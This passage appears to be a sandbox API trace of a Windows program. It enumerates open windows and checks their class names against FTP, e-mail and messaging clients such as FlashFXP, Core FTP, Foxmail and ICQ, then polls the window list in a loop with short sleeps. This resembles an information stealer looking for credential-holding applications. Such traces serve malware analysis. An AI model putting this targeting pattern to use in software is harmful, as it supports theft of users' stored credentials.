(in: hWnd=0x102a0, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="leechftpapp") returned 11 [0097.013] GetClassNameA (in: hWnd=0x102a2, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="icqwindow") returned 9 [0097.013] GetClassNameA (in: hWnd=0x10278, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="coreftp_") returned 8 [0097.013] GetClassNameA (in: hWnd=0x102a4, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="gmailnotifierpro_app") returned 20 [0097.013] GetClassNameA (in: hWnd=0x10296, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="fling") returned 5 [0097.014] GetClassNameA (in: hWnd=0x10294, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="foxmailincmailapp") returned 17 [0097.014] GetClassNameA (in: hWnd=0x10272, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="barca_wnd") returned 9 [0097.014] GetClassNameA (in: hWnd=0x1028a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="flashfxp_window") returned 15 [0097.014] GetClassNameA (in: hWnd=0x10268, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="alftpwnd") returned 8 [0097.014] GetClassNameA (in: hWnd=0x10280, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="far_class") returned 9 [0097.014] GetClassNameA (in: hWnd=0x10276, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="bitkinexwindow") returned 14 [0097.014] GetClassNameA (in: hWnd=0x1026c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="absolutetelnetwindow") returned 20 [0097.014] GetClassNameA (in: hWnd=0x1024c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Minute_Budget_themselves_window") returned 31 [0097.014] GetClassNameA (in: hWnd=0x10260, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="3dftpcls") returned 8 [0097.014] GetClassNameA (in: hWnd=0x10246, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="health_prove_opportunity_") returned 25 [0097.015] GetClassNameA (in: hWnd=0x10244, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="breakapp") returned 8 [0097.015] GetClassNameA (in: hWnd=0x1023a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="goodwnd") returned 7 [0097.015] GetClassNameA (in: hWnd=0x1023c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="itemStudysafecls") returned 16 [0097.015] GetClassNameA (in: hWnd=0x10230, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="structurecausebar") returned 17 [0097.015] GetClassNameA (in: hWnd=0x1021e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Question_app") returned 12 [0097.015] GetClassNameA (in: hWnd=0x10232, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="MemoryEverybodynaturecls") returned 24 [0097.015] GetClassNameA (in: hWnd=0x1022a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="PlayHitwin") returned 10 [0097.015] GetClassNameA (in: hWnd=0x10228, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="evening_wnd") returned 11 [0097.015] GetClassNameA (in: hWnd=0x10226, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="meanwin") returned 7 [0097.015] GetClassNameA (in: hWnd=0x10212, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="feel_wnd") returned 8 [0097.015] GetClassNameA (in: hWnd=0x10210, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="reachinvolvewnd") returned 15 [0097.015] GetClassNameA (in: hWnd=0x10214, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="action_Program_citizen_window") returned 29 [0097.015] GetClassNameA (in: hWnd=0x10208, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Myselfclass") returned 11 [0097.015] GetClassNameA (in: hWnd=0x30202, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="student_because_democratic_app") returned 30 [0097.015] GetClassNameA (in: hWnd=0x10206, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Sharewnd") returned 8 [0097.016] GetClassNameA (in: hWnd=0x201f8, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0097.016] GetClassNameA (in: hWnd=0x101e4, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0097.016] GetClassNameA (in: hWnd=0x201de, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0097.016] GetClassNameA (in: hWnd=0x2013e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IEFrame") returned 7 [0097.016] GetClassNameA (in: hWnd=0x101e6, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0097.016] GetClassNameA (in: hWnd=0x2015e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0097.016] GetClassNameA (in: hWnd=0x20142, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0097.016] GetClassNameA (in: hWnd=0x20140, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0097.016] GetClassNameA (in: hWnd=0x2013c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0097.016] GetClassNameA (in: hWnd=0x30020, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0097.016] GetClassNameA (in: hWnd=0x101ca, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="ATL:00007FFA08097080") returned 20 [0097.016] GetClassNameA (in: hWnd=0x101be, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0097.016] GetClassNameA (in: hWnd=0x101b0, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="SystemTray_Main") returned 15 [0097.016] GetClassNameA (in: hWnd=0x101ac, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0097.016] GetClassNameA (in: hWnd=0x101aa, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0097.016] GetClassNameA (in: hWnd=0x10126, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0097.016] GetClassNameA (in: hWnd=0x1012e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="TabletModeCoverWindow") returned 21 [0097.017] GetClassNameA (in: hWnd=0x101a0, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0097.017] GetClassNameA (in: hWnd=0x101a2, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0097.017] GetClassNameA (in: hWnd=0x1012c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="DummyDWMListenerWindow") returned 22 [0097.017] GetClassNameA (in: hWnd=0x10124, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0097.017] GetClassNameA (in: hWnd=0x1010a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="PushNotificationsPowerManagement") returned 32 [0097.017] GetClassNameA (in: hWnd=0x10108, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0097.017] GetClassNameA (in: hWnd=0x10100, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="ApplicationManager_DesktopShellWindow") returned 37 [0097.017] GetClassNameA (in: hWnd=0x100fc, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0097.017] GetClassNameA (in: hWnd=0x100f6, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0097.017] GetClassNameA (in: hWnd=0x100f4, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0097.017] GetClassNameA (in: hWnd=0x200e0, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0097.017] GetClassNameA (in: hWnd=0x100ce, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0097.017] GetClassNameA (in: hWnd=0x2001e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0097.017] GetClassNameA (in: hWnd=0x20034, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0097.017] GetClassNameA (in: hWnd=0x20036, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0097.017] GetClassNameA (in: hWnd=0x2004c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0097.017] GetClassNameA (in: hWnd=0x101d4, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0097.018] GetClassNameA (in: hWnd=0x200f2, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0097.018] GetClassNameA (in: hWnd=0x200ee, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0097.018] GetClassNameA (in: hWnd=0x100ba, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0097.018] GetClassNameA (in: hWnd=0x2007c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0097.018] GetClassNameA (in: hWnd=0x20072, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0097.018] GetClassNameA (in: hWnd=0x4006e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0097.018] GetClassNameA (in: hWnd=0x10024, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Dwm") returned 3 [0097.018] GetClassNameA (in: hWnd=0x10180, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="CicLoaderWndClass") returned 17 [0097.018] GetClassNameA (in: hWnd=0x30242, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0097.018] GetClassNameA (in: hWnd=0x100de, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Progman") returned 7 [0097.018] GetClassNameA (in: hWnd=0x1014c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.018] GetClassNameA (in: hWnd=0x1017a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.018] GetClassNameA (in: hWnd=0x1016c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.018] GetClassNameA (in: hWnd=0x1015c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.018] GetClassNameA (in: hWnd=0x10190, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.018] GetClassNameA (in: hWnd=0x100dc, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0097.019] GetClassNameA (in: hWnd=0x1008e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.019] GetClassNameA (in: hWnd=0x1037c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.019] GetClassNameA (in: hWnd=0x20238, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.019] GetClassNameA (in: hWnd=0x2020e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.019] GetClassNameA (in: hWnd=0x20330, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.019] GetClassNameA (in: hWnd=0x1037a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.019] GetClassNameA (in: hWnd=0x10378, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.019] GetClassNameA (in: hWnd=0x10376, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.019] GetClassNameA (in: hWnd=0x10374, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.019] GetClassNameA (in: hWnd=0x10370, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.019] GetClassNameA (in: hWnd=0x1036e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.019] GetClassNameA (in: hWnd=0x1036c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.019] GetClassNameA (in: hWnd=0x1036a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.019] GetClassNameA (in: hWnd=0x10364, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.019] GetClassNameA (in: hWnd=0x10362, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.020] GetClassNameA (in: hWnd=0x10360, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.020] GetClassNameA (in: hWnd=0x1035e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.020] GetClassNameA (in: hWnd=0x1035c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.020] GetClassNameA (in: hWnd=0x1035a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.020] GetClassNameA (in: hWnd=0x20204, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.020] GetClassNameA (in: hWnd=0x10358, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.020] GetClassNameA (in: hWnd=0x10354, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.020] GetClassNameA (in: hWnd=0x10352, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.020] GetClassNameA (in: hWnd=0x1034e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.020] GetClassNameA (in: hWnd=0x1034c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.020] GetClassNameA (in: hWnd=0x10346, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.020] GetClassNameA (in: hWnd=0x10344, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.020] GetClassNameA (in: hWnd=0x10342, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.020] GetClassNameA (in: hWnd=0x10338, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.020] GetClassNameA (in: hWnd=0x1032e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.020] GetClassNameA (in: hWnd=0x10328, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.021] GetClassNameA (in: hWnd=0x1031e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.021] GetClassNameA (in: hWnd=0x10318, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.021] GetClassNameA (in: hWnd=0x10310, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.021] GetClassNameA (in: hWnd=0x10308, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.021] GetClassNameA (in: hWnd=0x102fe, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.021] GetClassNameA (in: hWnd=0x102f8, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.021] GetClassNameA (in: hWnd=0x102ec, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.021] GetClassNameA (in: hWnd=0x102e2, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.021] GetClassNameA (in: hWnd=0x102e0, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.021] GetClassNameA (in: hWnd=0x102d6, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.021] GetClassNameA (in: hWnd=0x102d2, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.021] GetClassNameA (in: hWnd=0x102ca, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.021] GetClassNameA (in: hWnd=0x102c8, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.021] GetClassNameA (in: hWnd=0x102bc, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.021] GetClassNameA (in: hWnd=0x102ba, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.021] GetClassNameA (in: hWnd=0x102b2, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.022] GetClassNameA (in: hWnd=0x102a8, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.022] GetClassNameA (in: hWnd=0x10290, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.022] GetClassNameA (in: hWnd=0x1028e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.022] GetClassNameA (in: hWnd=0x10286, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.022] GetClassNameA (in: hWnd=0x10284, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.022] GetClassNameA (in: hWnd=0x10270, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.022] GetClassNameA (in: hWnd=0x10266, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.022] GetClassNameA (in: hWnd=0x10262, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.022] GetClassNameA (in: hWnd=0x10258, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.022] GetClassNameA (in: hWnd=0x10256, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.022] GetClassNameA (in: hWnd=0x10252, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.022] GetClassNameA (in: hWnd=0x10250, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.023] GetClassNameA (in: hWnd=0x1024e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.023] GetClassNameA (in: hWnd=0x1024a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.023] GetClassNameA (in: hWnd=0x10248, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.023] GetClassNameA (in: hWnd=0x1023e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.023] GetClassNameA (in: hWnd=0x10234, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.023] GetClassNameA (in: hWnd=0x10224, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.023] GetClassNameA (in: hWnd=0x10218, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.023] GetClassNameA (in: hWnd=0x10216, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.023] GetClassNameA (in: hWnd=0x20138, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.023] GetClassNameA (in: hWnd=0x101cc, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.023] GetClassNameA (in: hWnd=0x101ae, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.024] GetClassNameA (in: hWnd=0x1010c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.024] GetClassNameA (in: hWnd=0x100fe, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.024] GetClassNameA (in: hWnd=0x100f8, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0097.024] GetClassNameA (in: hWnd=0x100ea, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.024] GetClassNameA (in: hWnd=0x20032, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.024] GetClassNameA (in: hWnd=0x2019e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.024] GetClassNameA (in: hWnd=0x1007e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.024] GetClassNameA (in: hWnd=0x20074, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0097.024] Sleep (dwMilliseconds=0x64) [0097.165] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0097.165] GetClassNameA (in: hWnd=0x100ec, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Worker Window") returned 13 [0097.165] GetClassNameA (in: hWnd=0x1014a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0097.165] GetClassNameA (in: hWnd=0x1010e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0097.165] GetClassNameA (in: hWnd=0x1011c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0097.165] GetClassNameA (in: hWnd=0x10120, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0097.165] GetClassNameA (in: hWnd=0x10122, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0097.165] GetClassNameA (in: hWnd=0x1011e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0097.165] GetClassNameA (in: hWnd=0x1011a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0097.166] GetClassNameA (in: hWnd=0x10118, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0097.166] GetClassNameA (in: hWnd=0x10116, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0097.166] GetClassNameA (in: hWnd=0x10114, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0097.166] GetClassNameA (in: hWnd=0x10178, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0097.166] GetClassNameA (in: hWnd=0x1016a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0097.166] GetClassNameA (in: hWnd=0x1015a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0097.166] GetClassNameA (in: hWnd=0x10112, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0097.166] GetClassNameA (in: hWnd=0x10102, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="ApplicationManager_ImmersiveShellWindow") returned 39 [0097.166] GetClassNameA (in: hWnd=0x10198, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0097.166] Sleep (dwMilliseconds=0x64) [0097.364] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0097.365] Sleep (dwMilliseconds=0x64) [0097.510] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0097.510] Sleep (dwMilliseconds=0x64) [0097.626] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0097.626] Sleep (dwMilliseconds=0x64) [0097.766] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0097.766] Sleep (dwMilliseconds=0x64) [0097.884] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0097.884] Sleep (dwMilliseconds=0x64) [0098.088] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0098.088] Sleep (dwMilliseconds=0x64) [0098.243] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0098.243] Sleep (dwMilliseconds=0x64) [0098.452] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0098.453] Sleep (dwMilliseconds=0x64) [0098.650] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0098.650] Sleep (dwMilliseconds=0x64) [0098.832] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0098.832] Sleep (dwMilliseconds=0x64) [0098.961] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0098.961] Sleep (dwMilliseconds=0x64) [0099.163] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0099.167] Sleep (dwMilliseconds=0x64) [0099.274] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0099.274] Sleep (dwMilliseconds=0x64) [0099.429] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0099.429] Sleep (dwMilliseconds=0x64) [0099.833] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0099.833] Sleep (dwMilliseconds=0x64) [0099.993] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0099.993] Sleep (dwMilliseconds=0x64) [0100.137] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0100.137] Sleep (dwMilliseconds=0x64) [0100.247] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0100.247] Sleep (dwMilliseconds=0x64) [0100.426] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0100.427] Sleep (dwMilliseconds=0x64) [0100.578] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0100.578] Sleep (dwMilliseconds=0x64) [0100.763] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0100.764] Sleep (dwMilliseconds=0x64) [0100.906] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0100.906] Sleep (dwMilliseconds=0x64) [0101.076] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0101.077] Sleep (dwMilliseconds=0x64) [0101.220] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0101.221] Sleep (dwMilliseconds=0x64) [0101.359] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0101.360] Sleep (dwMilliseconds=0x64) [0101.654] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0101.655] Sleep (dwMilliseconds=0x64) [0101.767] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0101.767] Sleep (dwMilliseconds=0x64) [0101.986] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0101.987] Sleep (dwMilliseconds=0x64) [0102.145] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0102.145] Sleep (dwMilliseconds=0x64) [0102.290] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0102.290] Sleep (dwMilliseconds=0x64) [0102.681] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0102.682] Sleep (dwMilliseconds=0x64) [0102.798] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0102.798] Sleep (dwMilliseconds=0x64) [0103.118] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0103.118] Sleep (dwMilliseconds=0x64) [0103.243] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0103.244] Sleep (dwMilliseconds=0x64) [0103.378] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0103.379] Sleep (dwMilliseconds=0x64) [0103.649] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0103.649] Sleep (dwMilliseconds=0x64) [0103.774] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0103.774] Sleep (dwMilliseconds=0x64) [0103.993] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0103.993] Sleep (dwMilliseconds=0x64) [0104.134] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0104.134] Sleep (dwMilliseconds=0x64) [0104.355] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0104.356] Sleep (dwMilliseconds=0x64) [0104.465] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0104.465] Sleep (dwMilliseconds=0x64) [0104.603] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0104.603] Sleep (dwMilliseconds=0x64) [0104.899] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0104.899] Sleep (dwMilliseconds=0x64) [0105.011] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0105.012] Sleep (dwMilliseconds=0x64) [0105.214] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0105.214] Sleep (dwMilliseconds=0x64) [0105.367] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0105.367] Sleep (dwMilliseconds=0x64) 